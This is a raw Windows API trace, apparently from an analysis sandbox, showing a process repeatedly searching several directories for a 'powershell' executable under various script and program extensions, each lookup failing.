	[0417.646] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.654] SetErrorMode (uMode=0x1) returned 0x1
	[0417.655] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.655] SetErrorMode (uMode=0x1) returned 0x1
	[0417.655] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.663] SetErrorMode (uMode=0x1) returned 0x1
	[0417.665] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.665] SetErrorMode (uMode=0x1) returned 0x1
	[0417.665] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.672] SetErrorMode (uMode=0x1) returned 0x1
	[0417.674] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.674] SetErrorMode (uMode=0x1) returned 0x1
	[0417.674] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.972] SetErrorMode (uMode=0x1) returned 0x1
	[0417.973] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.973] SetErrorMode (uMode=0x1) returned 0x1
	[0417.973] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.985] SetErrorMode (uMode=0x1) returned 0x1
	[0417.986] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.987] SetErrorMode (uMode=0x1) returned 0x1
	[0417.987] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.997] SetErrorMode (uMode=0x1) returned 0x1
	[0417.999] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0417.999] SetErrorMode (uMode=0x1) returned 0x1
	[0417.999] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.297] SetErrorMode (uMode=0x1) returned 0x1
	[0418.298] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0418.298] SetErrorMode (uMode=0x1) returned 0x1
	[0418.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.306] SetErrorMode (uMode=0x1) returned 0x1
	[0418.307] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0418.307] SetErrorMode (uMode=0x1) returned 0x1
	[0418.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.315] SetErrorMode (uMode=0x1) returned 0x1
	[0418.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.316] SetErrorMode (uMode=0x1) returned 0x1
	[0418.316] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.317] SetErrorMode (uMode=0x1) returned 0x1
	[0418.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.317] SetErrorMode (uMode=0x1) returned 0x1
	[0418.317] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.318] SetErrorMode (uMode=0x1) returned 0x1
	[0418.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.318] SetErrorMode (uMode=0x1) returned 0x1
	[0418.318] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.318] SetErrorMode (uMode=0x1) returned 0x1
	[0418.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.318] SetErrorMode (uMode=0x1) returned 0x1
	[0418.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.319] SetErrorMode (uMode=0x1) returned 0x1
	[0418.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.319] SetErrorMode (uMode=0x1) returned 0x1
	[0418.319] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.319] SetErrorMode (uMode=0x1) returned 0x1
	[0418.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.320] SetErrorMode (uMode=0x1) returned 0x1
	[0418.320] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.320] SetErrorMode (uMode=0x1) returned 0x1
	[0418.320] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.320] SetErrorMode (uMode=0x1) returned 0x1
	[0418.320] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.321] SetErrorMode (uMode=0x1) returned 0x1
	[0418.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.321] SetErrorMode (uMode=0x1) returned 0x1
	[0418.321] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.321] SetErrorMode (uMode=0x1) returned 0x1
	[0418.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.321] SetErrorMode (uMode=0x1) returned 0x1
	[0418.322] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.322] SetErrorMode (uMode=0x1) returned 0x1
	[0418.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.322] SetErrorMode (uMode=0x1) returned 0x1
	[0418.322] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.322] SetErrorMode (uMode=0x1) returned 0x1
	[0418.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.322] SetErrorMode (uMode=0x1) returned 0x1
	[0418.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.323] SetErrorMode (uMode=0x1) returned 0x1
	[0418.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.323] SetErrorMode (uMode=0x1) returned 0x1
	[0418.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.323] SetErrorMode (uMode=0x1) returned 0x1
	[0418.323] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.324] SetErrorMode (uMode=0x1) returned 0x1
	[0418.324] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.324] SetErrorMode (uMode=0x1) returned 0x1
	[0418.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.324] SetErrorMode (uMode=0x1) returned 0x1
	[0418.324] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.324] SetErrorMode (uMode=0x1) returned 0x1
	[0418.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.325] SetErrorMode (uMode=0x1) returned 0x1
	[0418.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.325] SetErrorMode (uMode=0x1) returned 0x1
	[0418.325] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.325] SetErrorMode (uMode=0x1) returned 0x1
	[0418.325] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.325] SetErrorMode (uMode=0x1) returned 0x1
	[0418.326] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.326] SetErrorMode (uMode=0x1) returned 0x1
	[0418.326] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.326] SetErrorMode (uMode=0x1) returned 0x1
	[0418.326] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.326] SetErrorMode (uMode=0x1) returned 0x1
	[0418.326] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.326] SetErrorMode (uMode=0x1) returned 0x1
	[0418.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.327] SetErrorMode (uMode=0x1) returned 0x1
	[0418.327] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.327] SetErrorMode (uMode=0x1) returned 0x1
	[0418.327] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.327] SetErrorMode (uMode=0x1) returned 0x1
	[0418.327] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.327] SetErrorMode (uMode=0x1) returned 0x1
	[0418.328] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c70d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.328] SetErrorMode (uMode=0x1) returned 0x1
	[0418.328] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c70d940 | out: lpFindFileData=0x1c70d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0418.328] SetErrorMode (uMode=0x1) returned 0x1
